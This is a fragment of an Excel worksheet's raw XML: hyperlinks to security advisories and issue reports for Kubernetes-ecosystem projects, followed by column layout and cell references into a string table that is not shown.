Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/kubernetes/issues/131008" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/kubernetes/issues/131006" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/argoproj/argo-cd/security/advisories/GHSA-jhqp-vf4w-rpwq" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/argoproj/argo-cd/security/advisories/GHSA-q4w5-4gq2-98vm" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/fluxcd/flux2/security/advisories/GHSA-vvmq-fwmg-2gjc" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/kubernetes/issues/126744" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/metal3-io/baremetal-operator/security/advisories/GHSA-pqfh-xh7w-7h3p" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/kubernetes/issues/126812" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/containerd/containerd/security/advisories/GHSA-5ffw-gxpp-mxpf" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bugzilla.redhat.com/show_bug.cgi?id=1848951" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/fluxcd/flux2/security/advisories/GHSA-7pwf-jg34-hxwp" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/fluxcd/flux2/security/advisories/GHSA-f4p5-x4vc-mh4v" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/fluxcd/flux2/security/advisories/GHSA-p2g7-xwvr-rrw3" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/fluxcd/source-controller/pull/903/commits/27f4ed5a472d1bd5b6bc7a62189f20c115338b3a" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/backstage/backstage/security/advisories/GHSA-pvv8-8fx9-h673" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/backstage/backstage/security/advisories/GHSA-wg6p-jmpc-xjmr" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/argoproj/argo-workflows/issues/6441" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/ingress-nginx" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://apiiro.com/blog/malicious-kubernetes-helm-charts-can-be-used-to-steal-sensitive-information-from-argo-cd-deployments/&#10;" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/argoproj/argo-events/security/advisories/GHSA-qpgx-64h2-gc3c" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/argoproj/argo-cd/issues/12309" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/argoproj/argo-cd/pull/12320/commits/200c3c156e9c27c6c5b197a5be28315e9b802b12" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/argoproj/argo-cd/security/advisories/GHSA-h6h5-6fmq-rh28" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/projectcontour/contour/security/advisories/GHSA-5ph6-qq5x-7jwc" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/cilium/cilium/security/advisories/GHSA-gj2r-phwg-6rww" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/fluxcd/kustomize-controller/security/advisories/GHSA-35rf-v2jv-gfg7" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/argoproj/argo-workflows/security/advisories/GHSA-cmv8-6362-r5w9" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubevirt/kubevirt/pull/3686" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/kubernetes/issues/1268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8"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0">
      <selection activeCell="G3" sqref="G3"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.89166666666667" defaultRowHeight="11.25"/>
  <cols>
    <col min="1" max="1" width="26.8333333333333" style="65" customWidth="1"/>
    <col min="2" max="2" width="19.0166666666667" style="57" customWidth="1"/>
    <col min="3" max="3" width="19.775" style="57" customWidth="1"/>
    <col min="4" max="4" width="41.35" style="57" customWidth="1"/>
    <col min="5" max="5" width="16.4166666666667" style="57" customWidth="1"/>
    <col min="6" max="6" width="15.1833333333333" style="57" customWidth="1"/>
    <col min="7" max="7" width="14.3166666666667" style="57" customWidth="1"/>
    <col min="8" max="8" width="17.225" style="57" customWidth="1"/>
    <col min="9" max="9" width="26.475" style="57" customWidth="1"/>
    <col min="10" max="10" width="90.8083333333333" style="57" customWidth="1"/>
    <col min="11" max="13" width="8.68333333333333" style="57" customWidth="1"/>
    <col min="14" max="14" width="27.575" style="57" customWidth="1"/>
    <col min="15" max="15" width="21.7" style="57" customWidth="1"/>
    <col min="16" max="16" width="17.4083333333333" style="57" customWidth="1"/>
    <col min="17" max="17" width="15.1833333333333" style="57" customWidth="1"/>
    <col min="18" max="18" width="13.2" style="57" customWidth="1"/>
    <col min="19" max="19" width="19.25" style="57" customWidth="1"/>
    <col min="20" max="20" width="112.516666666667" style="66" customWidth="1"/>
    <col min="21" max="22" width="23.3333333333333" style="57" customWidth="1"/>
    <col min="23" max="23" width="16.5" style="57" customWidth="1"/>
    <col min="24" max="24" width="14.1916666666667" style="57" customWidth="1"/>
    <col min="25" max="25" width="16.7833333333333" style="57" customWidth="1"/>
    <col min="26" max="26" width="25" style="57" customWidth="1"/>
    <col min="27" max="28" width="10.4916666666667" style="57" customWidth="1"/>
    <col min="29" max="29" width="13.0916666666667" style="57" customWidth="1"/>
    <col min="30" max="30" width="16.7833333333333" style="57" customWidth="1"/>
    <col min="31" max="32" width="16.5" style="57" customWidth="1"/>
    <col min="33" max="35" width="16.0333333333333" style="57" customWidth="1"/>
    <col min="36" max="36" width="16.5" style="57" customWidth="1"/>
    <col min="37" max="37" width="16.0333333333333" style="57" customWidth="1"/>
    <col min="38" max="38" width="51.3333333333333" style="57" customWidth="1"/>
    <col min="39" max="39" width="16.0333333333333" style="57" customWidth="1"/>
    <col min="40" max="40" width="12.775" style="66" customWidth="1"/>
    <col min="41" max="41" width="23.1083333333333" style="57" customWidth="1"/>
    <col min="42" max="42" width="12.775" style="57" customWidth="1"/>
    <col min="43" max="45" width="22.0916666666667" style="57" customWidth="1"/>
    <col min="46" max="46" width="39.975" style="57" customWidth="1"/>
    <col min="47" max="47" width="28.8666666666667" style="57" customWidth="1"/>
    <col min="48" max="48" width="24.775" style="66" customWidth="1"/>
    <col min="49" max="49" width="36.6666666666667" style="57" customWidth="1"/>
    <col min="50" max="50" width="24.775" style="57" customWidth="1"/>
    <col min="51" max="51" width="27.6583333333333" style="60" customWidth="1"/>
    <col min="52" max="52" width="24.775" style="57" customWidth="1"/>
    <col min="53" max="53" width="27.775" style="60" customWidth="1"/>
    <col min="54" max="54" width="27.6583333333333" style="60" customWidth="1"/>
    <col min="55" max="55" width="8.13333333333333" style="60" hidden="1" customWidth="1"/>
    <col min="56" max="57" width="18.925" style="60" hidden="1" customWidth="1"/>
    <col min="58" max="16383" width="8.89166666666667" style="57"/>
    <col min="16384" max="16384" width="8.89166666666667" style="63"/>
  </cols>
  <sheetData>
    <row r="1" s="57" customFormat="1" ht="85" customHeight="1" spans="1:57">
      <c r="A1" s="67" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="68" t="s">
        <v>1</v>
      </c>
      <c r="C1" s="68" t="s">
        <v>2</v>
      </c>
      <c r="D1" s="68" t="s">
        <v>3</v>
      </c>
      <c r="E1" s="68" t="s">
        <v>4</v>
      </c>
      <c r="F1" s="68" t="s">
        <v>5</v>
      </c>
      <c r="G1" s="68" t="s">
        <v>6</v>
      </c>
      <c r="H1" s="68" t="s">
        <v>7</v>
      </c>
      <c r="I1" s="68" t="s">
        <v>8</v>
      </c>
      <c r="J1" s="125" t="s">
        <v>9</v>
      </c>
      <c r="K1" s="68" t="s">
        <v>10</v>
      </c>
      <c r="L1" s="68" t="s">
        <v>11</v>
      </c>
      <c r="M1" s="68" t="s">
        <v>12</v>
      </c>
      <c r="N1" s="68" t="s">
        <v>13</v>
      </c>
      <c r="O1" s="68" t="s">
        <v>14</v>
      </c>
      <c r="P1" s="68" t="s">
        <v>15</v>
      </c>
      <c r="Q1" s="68" t="s">
        <v>16</v>
      </c>
      <c r="R1" s="68" t="s">
        <v>17</v>
      </c>
      <c r="S1" s="68" t="s">
        <v>18</v>
      </c>
      <c r="T1" s="133" t="s">
        <v>19</v>
      </c>
      <c r="U1" s="68" t="s">
        <v>20</v>
      </c>
      <c r="V1" s="68" t="s">
        <v>21</v>
      </c>
      <c r="W1" s="68" t="s">
        <v>22</v>
      </c>
      <c r="X1" s="68" t="s">
        <v>23</v>
      </c>
      <c r="Y1" s="68" t="s">
        <v>24</v>
      </c>
      <c r="Z1" s="68" t="s">
        <v>25</v>
      </c>
      <c r="AA1" s="68" t="s">
        <v>26</v>
      </c>
      <c r="AB1" s="68" t="s">
        <v>27</v>
      </c>
      <c r="AC1" s="68" t="s">
        <v>28</v>
      </c>
      <c r="AD1" s="68" t="s">
        <v>29</v>
      </c>
      <c r="AE1" s="68" t="s">
        <v>30</v>
      </c>
      <c r="AF1" s="68" t="s">
        <v>31</v>
      </c>
      <c r="AG1" s="68" t="s">
        <v>32</v>
      </c>
      <c r="AH1" s="68" t="s">
        <v>33</v>
      </c>
      <c r="AI1" s="68" t="s">
        <v>34</v>
      </c>
      <c r="AJ1" s="68" t="s">
        <v>35</v>
      </c>
      <c r="AK1" s="68" t="s">
        <v>36</v>
      </c>
      <c r="AL1" s="68" t="s">
        <v>37</v>
      </c>
      <c r="AM1" s="68" t="s">
        <v>38</v>
      </c>
      <c r="AN1" s="133" t="s">
        <v>39</v>
      </c>
      <c r="AO1" s="68" t="s">
        <v>40</v>
      </c>
      <c r="AP1" s="68" t="s">
        <v>41</v>
      </c>
      <c r="AQ1" s="68" t="s">
        <v>42</v>
      </c>
      <c r="AR1" s="68" t="s">
        <v>43</v>
      </c>
      <c r="AS1" s="68" t="s">
        <v>44</v>
      </c>
      <c r="AT1" s="68" t="s">
        <v>45</v>
      </c>
      <c r="AU1" s="68" t="s">
        <v>46</v>
      </c>
      <c r="AV1" s="133" t="s">
        <v>47</v>
      </c>
      <c r="AW1" s="68" t="s">
        <v>48</v>
      </c>
      <c r="AX1" s="68" t="s">
        <v>49</v>
      </c>
      <c r="AY1" s="127" t="s">
        <v>50</v>
      </c>
      <c r="AZ1" s="68" t="s">
        <v>51</v>
      </c>
      <c r="BA1" s="127" t="s">
        <v>52</v>
      </c>
      <c r="BB1" s="127" t="s">
        <v>53</v>
      </c>
      <c r="BC1" s="127" t="s">
        <v>54</v>
      </c>
      <c r="BD1" s="127" t="s">
        <v>55</v>
      </c>
      <c r="BE1" s="127" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2" s="58" customFormat="1" ht="261" customHeight="1" spans="1:54">
      <c r="A2" s="69" t="s">
        <v>57</v>
      </c>
      <c r="C2" s="70" t="s">
        <v>58</v>
      </c>
      <c r="D2" s="58" t="s">
        <v>59</v>
      </c>
      <c r="E2" s="58" t="s">
        <v>60</v>
      </c>
      <c r="F2" s="58" t="s">
        <v>61</v>
      </c>
      <c r="G2" s="71" t="s">
        <v>62</v>
      </c>
      <c r="H2" s="59" t="s">
        <v>63</v>
      </c>
      <c r="I2" s="58" t="s">
        <v>64</v>
      </c>
      <c r="J2" s="126" t="s">
        <v>65</v>
      </c>
      <c r="K2" s="58" t="s">
        <v>66</v>
      </c>
      <c r="L2" s="58" t="s">
        <v>67</v>
      </c>
      <c r="M2" s="58" t="s">
        <v>68</v>
      </c>
      <c r="N2" s="58" t="s">
        <v>69</v>
      </c>
      <c r="O2" s="58" t="s">
        <v>70</v>
      </c>
      <c r="P2" s="58" t="s">
        <v>71</v>
      </c>
      <c r="Q2" s="58" t="s">
        <v>72</v>
      </c>
      <c r="R2" s="58" t="s">
        <v>73</v>
      </c>
      <c r="S2" s="58" t="s">
        <v>74</v>
      </c>
      <c r="T2" s="58" t="s">
        <v>75</v>
      </c>
      <c r="U2" s="58" t="s">
        <v>70</v>
      </c>
      <c r="V2" s="58" t="s">
        <v>76</v>
      </c>
      <c r="W2" s="58" t="s">
        <v>77</v>
      </c>
      <c r="X2" s="58" t="s">
        <v>78</v>
      </c>
      <c r="Y2" s="58" t="s">
        <v>79</v>
      </c>
      <c r="Z2" s="58" t="s">
        <v>80</v>
      </c>
      <c r="AA2" s="58" t="s">
        <v>81</v>
      </c>
      <c r="AB2" s="58" t="s">
        <v>82</v>
      </c>
      <c r="AC2" s="58" t="s">
        <v>83</v>
      </c>
      <c r="AD2" s="58" t="s">
        <v>84</v>
      </c>
      <c r="AE2" s="58" t="s">
        <v>85</v>
      </c>
      <c r="AF2" s="59" t="s">
        <v>86</v>
      </c>
      <c r="AG2" s="59"/>
      <c r="AH2" s="59" t="s">
        <v>87</v>
      </c>
      <c r="AI2" s="59"/>
      <c r="AJ2" s="59" t="s">
        <v>88</v>
      </c>
      <c r="AK2" s="59" t="s">
        <v>89</v>
      </c>
      <c r="AL2" s="59" t="s">
        <v>90</v>
      </c>
      <c r="AM2" s="59" t="s">
        <v>91</v>
      </c>
      <c r="AN2" s="58" t="s">
        <v>92</v>
      </c>
      <c r="AO2" s="58" t="s">
        <v>93</v>
      </c>
      <c r="AP2" s="58" t="s">
        <v>94</v>
      </c>
      <c r="AQ2" s="139" t="s">
        <v>95</v>
      </c>
      <c r="AR2" s="58" t="s">
        <v>96</v>
      </c>
      <c r="AS2" s="58" t="s">
        <v>97</v>
      </c>
      <c r="AT2" s="139" t="s">
        <v>98</v>
      </c>
      <c r="AU2" s="58" t="s">
        <v>99</v>
      </c>
      <c r="AV2" s="58" t="s">
        <v>100</v>
      </c>
      <c r="AW2" s="58" t="s">
        <v>101</v>
      </c>
      <c r="AX2" s="127" t="s">
        <v>102</v>
      </c>
      <c r="AY2" s="125" t="s">
        <v>103</v>
      </c>
      <c r="AZ2" s="139" t="s">
        <v>104</v>
      </c>
      <c r="BA2" s="125" t="s">
        <v>105</v>
      </c>
      <c r="BB2" s="125" t="s">
        <v>106</v>
      </c>
    </row>
    <row r="3" s="59" customFormat="1" ht="163" customHeight="1" spans="1:57">
      <c r="A3" s="72" t="s">
        <v>107</v>
      </c>
      <c r="B3" s="72" t="s">
        <v>108</v>
      </c>
      <c r="C3" s="72"/>
      <c r="D3" s="59" t="s">
        <v>109</v>
      </c>
      <c r="E3" s="59" t="s">
        <v>110</v>
      </c>
      <c r="F3" s="59" t="s">
        <v>111</v>
      </c>
      <c r="G3" s="59" t="s">
        <v>112</v>
      </c>
      <c r="H3" s="59" t="s">
        <v>63</v>
      </c>
      <c r="I3" s="59" t="s">
        <v>113</v>
      </c>
      <c r="J3" s="59" t="s">
        <v>114</v>
      </c>
      <c r="K3" s="59" t="s">
        <v>115</v>
      </c>
      <c r="L3" s="60" t="s">
        <v>67</v>
      </c>
      <c r="M3" s="60" t="s">
        <v>68</v>
      </c>
      <c r="N3" s="60" t="s">
        <v>69</v>
      </c>
      <c r="O3" s="59" t="s">
        <v>70</v>
      </c>
      <c r="P3" s="59" t="s">
        <v>71</v>
      </c>
      <c r="Q3" s="58" t="s">
        <v>72</v>
      </c>
      <c r="R3" s="58" t="s">
        <v>73</v>
      </c>
      <c r="S3" s="58" t="s">
        <v>74</v>
      </c>
      <c r="T3" s="59" t="s">
        <v>116</v>
      </c>
      <c r="U3" s="58" t="s">
        <v>84</v>
      </c>
      <c r="W3" s="59" t="s">
        <v>117</v>
      </c>
      <c r="X3" s="59" t="s">
        <v>84</v>
      </c>
      <c r="Y3" s="58" t="s">
        <v>118</v>
      </c>
      <c r="Z3" s="58" t="s">
        <v>119</v>
      </c>
      <c r="AA3" s="58" t="s">
        <v>81</v>
      </c>
      <c r="AB3" s="58" t="s">
        <v>82</v>
      </c>
      <c r="AC3" s="58" t="s">
        <v>83</v>
      </c>
      <c r="AD3" s="60" t="s">
        <v>84</v>
      </c>
      <c r="AE3" s="60" t="s">
        <v>120</v>
      </c>
      <c r="AF3" s="59" t="s">
        <v>121</v>
      </c>
      <c r="AH3" s="59" t="s">
        <v>122</v>
      </c>
      <c r="AJ3" s="59" t="s">
        <v>88</v>
      </c>
      <c r="AK3" s="59" t="s">
        <v>89</v>
      </c>
      <c r="AM3" s="59" t="s">
        <v>91</v>
      </c>
      <c r="AN3" s="58" t="s">
        <v>92</v>
      </c>
      <c r="AO3" s="58" t="s">
        <v>93</v>
      </c>
      <c r="AP3" s="58" t="s">
        <v>94</v>
      </c>
      <c r="AQ3" s="139" t="s">
        <v>95</v>
      </c>
      <c r="AR3" s="58" t="s">
        <v>96</v>
      </c>
      <c r="AS3" s="58" t="s">
        <v>97</v>
      </c>
      <c r="AT3" s="139" t="s">
        <v>98</v>
      </c>
      <c r="AU3" s="60" t="s">
        <v>123</v>
      </c>
      <c r="AV3" s="59" t="s">
        <v>124</v>
      </c>
      <c r="AW3" s="59" t="s">
        <v>125</v>
      </c>
      <c r="AX3" s="60" t="s">
        <v>126</v>
      </c>
      <c r="AY3" s="59" t="s">
        <v>127</v>
      </c>
      <c r="BA3" s="125" t="s">
        <v>128</v>
      </c>
      <c r="BB3" s="125" t="s">
        <v>129</v>
      </c>
      <c r="BC3" s="60" t="s">
        <v>130</v>
      </c>
      <c r="BE3" s="144"/>
    </row>
    <row r="4" s="59" customFormat="1" ht="101" customHeight="1" spans="1:57">
      <c r="A4" s="72" t="s">
        <v>131</v>
      </c>
      <c r="B4" s="72" t="s">
        <v>71</v>
      </c>
      <c r="C4" s="72"/>
      <c r="D4" s="59" t="s">
        <v>132</v>
      </c>
      <c r="E4" s="59" t="s">
        <v>133</v>
      </c>
      <c r="F4" s="59" t="s">
        <v>134</v>
      </c>
      <c r="G4" s="59" t="s">
        <v>135</v>
      </c>
      <c r="H4" s="59" t="s">
        <v>63</v>
      </c>
      <c r="J4" s="59" t="s">
        <v>136</v>
      </c>
      <c r="K4" s="60" t="s">
        <v>137</v>
      </c>
      <c r="L4" s="60" t="s">
        <v>67</v>
      </c>
      <c r="M4" s="60" t="s">
        <v>68</v>
      </c>
      <c r="N4" s="60" t="s">
        <v>69</v>
      </c>
      <c r="O4" s="59" t="s">
        <v>70</v>
      </c>
      <c r="P4" s="60" t="s">
        <v>71</v>
      </c>
      <c r="Q4" s="58" t="s">
        <v>72</v>
      </c>
      <c r="R4" s="58" t="s">
        <v>73</v>
      </c>
      <c r="S4" s="58" t="s">
        <v>74</v>
      </c>
      <c r="T4" s="59" t="s">
        <v>116</v>
      </c>
      <c r="U4" s="58" t="s">
        <v>84</v>
      </c>
      <c r="W4" s="59" t="s">
        <v>117</v>
      </c>
      <c r="X4" s="59" t="s">
        <v>84</v>
      </c>
      <c r="Y4" s="58" t="s">
        <v>118</v>
      </c>
      <c r="Z4" s="58" t="s">
        <v>119</v>
      </c>
      <c r="AA4" s="58" t="s">
        <v>81</v>
      </c>
      <c r="AB4" s="58" t="s">
        <v>82</v>
      </c>
      <c r="AC4" s="58" t="s">
        <v>83</v>
      </c>
      <c r="AD4" s="60" t="s">
        <v>84</v>
      </c>
      <c r="AE4" s="60" t="s">
        <v>120</v>
      </c>
      <c r="AF4" s="59" t="s">
        <v>121</v>
      </c>
      <c r="AH4" s="59" t="s">
        <v>122</v>
      </c>
      <c r="AJ4" s="59" t="s">
        <v>88</v>
      </c>
      <c r="AK4" s="59" t="s">
        <v>89</v>
      </c>
      <c r="AM4" s="59" t="s">
        <v>91</v>
      </c>
      <c r="AN4" s="58" t="s">
        <v>92</v>
      </c>
      <c r="AO4" s="58" t="s">
        <v>93</v>
      </c>
      <c r="AP4" s="58" t="s">
        <v>94</v>
      </c>
      <c r="AQ4" s="139" t="s">
        <v>95</v>
      </c>
      <c r="AR4" s="58" t="s">
        <v>96</v>
      </c>
      <c r="AS4" s="58" t="s">
        <v>97</v>
      </c>
      <c r="AT4" s="139" t="s">
        <v>98</v>
      </c>
      <c r="AU4" s="60" t="s">
        <v>123</v>
      </c>
      <c r="AV4" s="60" t="s">
        <v>124</v>
      </c>
      <c r="AW4" s="60" t="s">
        <v>125</v>
      </c>
      <c r="AX4" s="60" t="s">
        <v>126</v>
      </c>
      <c r="AY4" s="59" t="s">
        <v>127</v>
      </c>
      <c r="AZ4" s="58"/>
      <c r="BA4" s="125" t="s">
        <v>128</v>
      </c>
      <c r="BB4" s="125" t="s">
        <v>129</v>
      </c>
      <c r="BC4" s="60" t="s">
        <v>130</v>
      </c>
      <c r="BE4" s="144"/>
    </row>
    <row r="5" s="59" customFormat="1" ht="367.5" spans="1:57">
      <c r="A5" s="72" t="s">
        <v>138</v>
      </c>
      <c r="B5" s="72" t="s">
        <v>71</v>
      </c>
      <c r="C5" s="72" t="s">
        <v>139</v>
      </c>
      <c r="D5" s="59" t="s">
        <v>140</v>
      </c>
      <c r="E5" s="59" t="s">
        <v>141</v>
      </c>
      <c r="F5" s="59" t="s">
        <v>142</v>
      </c>
      <c r="G5" s="59" t="s">
        <v>143</v>
      </c>
      <c r="H5" s="59" t="s">
        <v>63</v>
      </c>
      <c r="J5" s="59" t="s">
        <v>144</v>
      </c>
      <c r="K5" s="59" t="s">
        <v>145</v>
      </c>
      <c r="L5" s="60" t="s">
        <v>67</v>
      </c>
      <c r="M5" s="60" t="s">
        <v>68</v>
      </c>
      <c r="N5" s="60" t="s">
        <v>69</v>
      </c>
      <c r="O5" s="59" t="s">
        <v>70</v>
      </c>
      <c r="P5" s="59" t="s">
        <v>71</v>
      </c>
      <c r="Q5" s="58" t="s">
        <v>72</v>
      </c>
      <c r="R5" s="58" t="s">
        <v>73</v>
      </c>
      <c r="S5" s="58" t="s">
        <v>74</v>
      </c>
      <c r="T5" s="59" t="s">
        <v>146</v>
      </c>
      <c r="U5" s="58" t="s">
        <v>84</v>
      </c>
      <c r="W5" s="59" t="s">
        <v>147</v>
      </c>
      <c r="X5" s="70" t="s">
        <v>78</v>
      </c>
      <c r="Y5" s="58" t="s">
        <v>118</v>
      </c>
      <c r="Z5" s="58" t="s">
        <v>148</v>
      </c>
      <c r="AA5" s="58" t="s">
        <v>81</v>
      </c>
      <c r="AB5" s="58" t="s">
        <v>82</v>
      </c>
      <c r="AC5" s="58" t="s">
        <v>83</v>
      </c>
      <c r="AD5" s="59" t="s">
        <v>84</v>
      </c>
      <c r="AE5" s="59" t="s">
        <v>85</v>
      </c>
      <c r="AF5" s="59" t="s">
        <v>86</v>
      </c>
      <c r="AH5" s="59" t="s">
        <v>87</v>
      </c>
      <c r="AJ5" s="59" t="s">
        <v>149</v>
      </c>
      <c r="AK5" s="59" t="s">
        <v>89</v>
      </c>
      <c r="AL5" s="59" t="s">
        <v>90</v>
      </c>
      <c r="AM5" s="59" t="s">
        <v>150</v>
      </c>
      <c r="AN5" s="58" t="s">
        <v>92</v>
      </c>
      <c r="AO5" s="58" t="s">
        <v>93</v>
      </c>
      <c r="AP5" s="58" t="s">
        <v>94</v>
      </c>
      <c r="AQ5" s="139" t="s">
        <v>95</v>
      </c>
      <c r="AR5" s="58" t="s">
        <v>96</v>
      </c>
      <c r="AS5" s="58" t="s">
        <v>97</v>
      </c>
      <c r="AT5" s="139" t="s">
        <v>98</v>
      </c>
      <c r="AU5" s="60" t="s">
        <v>151</v>
      </c>
      <c r="AV5" s="58" t="s">
        <v>100</v>
      </c>
      <c r="AW5" s="59" t="s">
        <v>152</v>
      </c>
      <c r="AX5" s="58"/>
      <c r="AZ5" s="58"/>
      <c r="BE5" s="144"/>
    </row>
    <row r="6" s="60" customFormat="1" ht="262.5" spans="1:57">
      <c r="A6" s="73" t="s">
        <v>153</v>
      </c>
      <c r="C6" s="60" t="s">
        <v>139</v>
      </c>
      <c r="D6" s="60" t="s">
        <v>154</v>
      </c>
      <c r="E6" s="60" t="s">
        <v>141</v>
      </c>
      <c r="F6" s="60" t="s">
        <v>155</v>
      </c>
      <c r="G6" s="60" t="s">
        <v>156</v>
      </c>
      <c r="H6" s="59" t="s">
        <v>63</v>
      </c>
      <c r="J6" s="60" t="s">
        <v>157</v>
      </c>
      <c r="K6" s="60" t="s">
        <v>158</v>
      </c>
      <c r="L6" s="60" t="s">
        <v>67</v>
      </c>
      <c r="M6" s="60" t="s">
        <v>68</v>
      </c>
      <c r="N6" s="60" t="s">
        <v>69</v>
      </c>
      <c r="O6" s="59" t="s">
        <v>70</v>
      </c>
      <c r="P6" s="60" t="s">
        <v>159</v>
      </c>
      <c r="Q6" s="58" t="s">
        <v>72</v>
      </c>
      <c r="R6" s="58" t="s">
        <v>73</v>
      </c>
      <c r="S6" s="58" t="s">
        <v>74</v>
      </c>
      <c r="T6" s="60" t="s">
        <v>160</v>
      </c>
      <c r="U6" s="58" t="s">
        <v>84</v>
      </c>
      <c r="W6" s="60" t="s">
        <v>147</v>
      </c>
      <c r="X6" s="60" t="s">
        <v>161</v>
      </c>
      <c r="Y6" s="58" t="s">
        <v>162</v>
      </c>
      <c r="Z6" s="58" t="s">
        <v>163</v>
      </c>
      <c r="AA6" s="58" t="s">
        <v>81</v>
      </c>
      <c r="AB6" s="58" t="s">
        <v>82</v>
      </c>
      <c r="AC6" s="58" t="s">
        <v>83</v>
      </c>
      <c r="AD6" s="60" t="s">
        <v>84</v>
      </c>
      <c r="AE6" s="60" t="s">
        <v>164</v>
      </c>
      <c r="AF6" s="59" t="s">
        <v>165</v>
      </c>
      <c r="AG6" s="59"/>
      <c r="AH6" s="59" t="s">
        <v>166</v>
      </c>
      <c r="AI6" s="59"/>
      <c r="AJ6" s="59" t="s">
        <v>88</v>
      </c>
      <c r="AK6" s="59" t="s">
        <v>89</v>
      </c>
      <c r="AL6" s="59" t="s">
        <v>167</v>
      </c>
      <c r="AM6" s="59" t="s">
        <v>150</v>
      </c>
      <c r="AN6" s="58" t="s">
        <v>92</v>
      </c>
      <c r="AO6" s="58" t="s">
        <v>93</v>
      </c>
      <c r="AP6" s="58" t="s">
        <v>94</v>
      </c>
      <c r="AQ6" s="139" t="s">
        <v>95</v>
      </c>
      <c r="AR6" s="58" t="s">
        <v>96</v>
      </c>
      <c r="AS6" s="58" t="s">
        <v>97</v>
      </c>
      <c r="AT6" s="139" t="s">
        <v>98</v>
      </c>
      <c r="AU6" s="60" t="s">
        <v>151</v>
      </c>
      <c r="AV6" s="58" t="s">
        <v>100</v>
      </c>
      <c r="AW6" s="59" t="s">
        <v>168</v>
      </c>
      <c r="AX6" s="60"/>
      <c r="BC6" s="60" t="s">
        <v>130</v>
      </c>
      <c r="BD6" s="60" t="s">
        <v>169</v>
      </c>
      <c r="BE6" s="145" t="s">
        <v>170</v>
      </c>
    </row>
    <row r="7" s="60" customFormat="1" ht="229" customHeight="1" spans="1:57">
      <c r="A7" s="73" t="s">
        <v>171</v>
      </c>
      <c r="C7" s="70" t="s">
        <v>58</v>
      </c>
      <c r="D7" s="60" t="s">
        <v>172</v>
      </c>
      <c r="E7" s="74" t="s">
        <v>173</v>
      </c>
      <c r="F7" s="60" t="s">
        <v>174</v>
      </c>
      <c r="G7" s="60" t="s">
        <v>175</v>
      </c>
      <c r="H7" s="59" t="s">
        <v>63</v>
      </c>
      <c r="J7" s="60" t="s">
        <v>176</v>
      </c>
      <c r="K7" s="60" t="s">
        <v>177</v>
      </c>
      <c r="L7" s="60" t="s">
        <v>67</v>
      </c>
      <c r="M7" s="60" t="s">
        <v>68</v>
      </c>
      <c r="N7" s="60" t="s">
        <v>69</v>
      </c>
      <c r="O7" s="60" t="s">
        <v>70</v>
      </c>
